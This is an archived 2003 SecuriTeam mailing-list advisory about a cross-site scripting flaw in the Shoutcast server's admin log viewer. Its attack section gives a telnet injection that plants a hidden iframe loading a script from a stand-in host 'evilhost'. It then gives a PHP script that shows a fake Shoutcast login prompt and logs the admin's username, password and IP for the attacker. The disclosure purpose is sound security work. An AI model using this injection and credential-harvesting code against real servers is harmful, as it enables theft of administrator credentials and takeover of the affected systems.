[NEWS] Cross Site Scripting Trick May Fool Shoutcast Admins

From: support@securiteam.com
Date: 03/03/03

  • Next message: support@securiteam.com: "[NEWS] The 419 nigerian frauds - step by step live explanation" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 3 Mar 2003 17:05:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Cross Site Scripting Trick May Fool Shoutcast Admins
    ------------------------------------------------------------------------

    SUMMARY

    Shoutcast has a good web front end for its admins to view logs, etc.
    However, the log mechanism does not filter HTML code, and therefore it is
    possible to inject HTML code into the log, and when the admin will view
    it, they will see the code.
    This enables a Cross-Site-Scripting attack against an administrator that
    uses the web interface.

    DETAILS

    Attack example:
    ---start---
    telnet localhost 8001
    <IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme
     
     
    invalid password
     

    Connection to host lost.

    ---end---

    This inserts an iframe into the browser and when the admin goes to view
    the log all he/she views is:
     [source] invalid password from changeme 127.0.0.1

    Exploit code:
    script.php can be something like:
    <?php
        $fp = fopen("log.txt","a+");
     if (!isset( $_SERVER["PHP_AUTH_USER"] )) {
         header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' );
         header( 'HTTP/1.0 401 Unauthorized' );
         echo '<HTML><HEAD>Unauthorized<title>SHOUTcast
    Administrator</title></HEAD></HTML>';
         exit;
       } else {
         fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' .
    $_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
     }
        fclose($fp);
    ?>
     
    This shows a login screen similar to shoutcast's. Only the information
    entered here is returned directly to the attacker!

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ssingh10@cox.net> ssingh10.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: support@securiteam.com: "[NEWS] The 419 nigerian frauds - step by step live explanation"